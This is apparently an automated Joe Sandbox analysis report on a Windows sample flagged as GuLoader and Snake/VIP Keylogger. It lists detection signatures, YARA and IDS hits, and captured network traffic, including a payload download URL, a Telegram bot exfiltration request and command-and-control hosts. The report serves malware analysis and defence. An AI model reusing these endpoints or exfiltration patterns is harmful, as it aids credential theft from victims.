Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MC8017774DOCS.exe

Overview

General Information

Sample name:MC8017774DOCS.exe
Analysis ID:1562048
MD5:d4c19e96d83bd586016a3be2e3a57f1d
SHA1:bf5d7271766db9b568ac98006c7eda0de40bc2bd
SHA256:5cba2773587387ad35e187bf5135467da368909ae0d4dd1a0f1d80be6338fc44
Tags:exeGuLoaderuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • MC8017774DOCS.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\MC8017774DOCS.exe" MD5: D4C19E96D83BD586016A3BE2E3A57F1D)
    • MC8017774DOCS.exe (PID: 4488 cmdline: "C:\Users\user\Desktop\MC8017774DOCS.exe" MD5: D4C19E96D83BD586016A3BE2E3A57F1D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x35581:$a1: get_encryptedPassword
        • 0x35555:$a2: get_encryptedUsername
        • 0x35619:$a3: get_timePasswordChanged
        • 0x35531:$a4: get_passwordField
        • 0x35597:$a5: set_encryptedPassword
        • 0x35364:$a7: get_logins
        • 0x30bfc:$a10: KeyLoggerEventArgs
        • 0x30bcb:$a11: KeyLoggerEventArgsEventHandler
        • 0x35438:$a13: _encryptedPassword
        00000000.00000002.2522145206.0000000000848000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
          Click to see the 25 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.MC8017774DOCS.exe.360e0f20.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            4.2.MC8017774DOCS.exe.360e0f20.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              4.2.MC8017774DOCS.exe.360e0f20.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 60 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T07:09:59.525079+010028033053Unknown Traffic192.168.2.649821172.67.177.134443TCP
                    2024-11-25T07:10:06.599757+010028033053Unknown Traffic192.168.2.649838172.67.177.134443TCP
                    2024-11-25T07:10:18.087506+010028033053Unknown Traffic192.168.2.649871172.67.177.134443TCP
                    2024-11-25T07:10:21.452984+010028033053Unknown Traffic192.168.2.649882172.67.177.134443TCP
                    2024-11-25T07:10:24.723371+010028033053Unknown Traffic192.168.2.649890172.67.177.134443TCP
                    2024-11-25T07:10:28.422026+010028033053Unknown Traffic192.168.2.649902172.67.177.134443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T07:09:55.095980+010028032742Potentially Bad Traffic192.168.2.649808132.226.8.16980TCP
                    2024-11-25T07:09:57.783587+010028032742Potentially Bad Traffic192.168.2.649808132.226.8.16980TCP
                    2024-11-25T07:10:04.799293+010028032742Potentially Bad Traffic192.168.2.649826132.226.8.16980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T07:09:51.498327+010028032702Potentially Bad Traffic192.168.2.649801185.244.144.6880TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: MC8017774DOCS.exeReversingLabs: Detection: 42%
                    Source: MC8017774DOCS.exeVirustotal: Detection: 48%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: MC8017774DOCS.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: MC8017774DOCS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49815 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49907 version: TLS 1.2
                    Source: MC8017774DOCS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mshtml.pdb source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: _.pdb source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: mshtml.pdbUGP source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /den/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: the.drillmmcsnk.topContent-Length: 1432Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 185.244.144.68 185.244.144.68
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49801 -> 185.244.144.68:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49808 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49826 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49838 -> 172.67.177.134:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49821 -> 172.67.177.134:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49890 -> 172.67.177.134:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49902 -> 172.67.177.134:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49871 -> 172.67.177.134:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49882 -> 172.67.177.134:443
                    Source: global trafficHTTP traffic detected: GET /pqvBgXvmocLIihvW108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49815 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /pqvBgXvmocLIihvW108.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: mertvinc.com.trCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: mertvinc.com.tr
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: the.drillmmcsnk.top
                    Source: unknownHTTP traffic detected: POST /den/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: the.drillmmcsnk.topContent-Length: 1432Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 25 Nov 2024 06:10:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D73000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3453633751.0000000003EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mertvinc.com.tr/pqvBgXvmocLIihvW108.bin
                    Source: MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mertvinc.com.tr/pqvBgXvmocLIihvW108.binW
                    Source: MC8017774DOCS.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://the.drillmmcsnk.top
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://the.drillmmcsnk.top/den/P4.php
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://the.drillmmcsnk.top/den/api.php
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
                    Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
                    Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20a
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F1D000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
